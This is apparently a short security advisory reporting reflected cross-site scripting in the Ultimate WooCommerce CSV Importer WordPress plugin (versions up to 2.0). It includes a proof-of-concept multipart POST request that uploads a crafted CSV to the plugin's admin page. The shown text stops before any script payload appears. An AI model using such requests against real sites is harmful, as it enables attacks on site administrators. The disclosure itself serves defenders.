Ultimate WooCommerce CSV Importer <= 2.0 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the imported data before outputting it back in the page, leading to a Reflected Cross-Site Scripting

PoC

POST /wp-admin/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookies: [logged in admin] Connection: close ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=“post_type” product ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=“separator” , ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=“titeled” on ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=“hierarchical_multicat” on ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=“upload_file”; filename=“example_code.csv” Content-Type: text/csv Name,Content,Price,Gender,sku,Multi_cat,Thumbnail Strawberry Short Cake,Delicious Strawberry Cake 18"",80,Bakery,001,Dessert,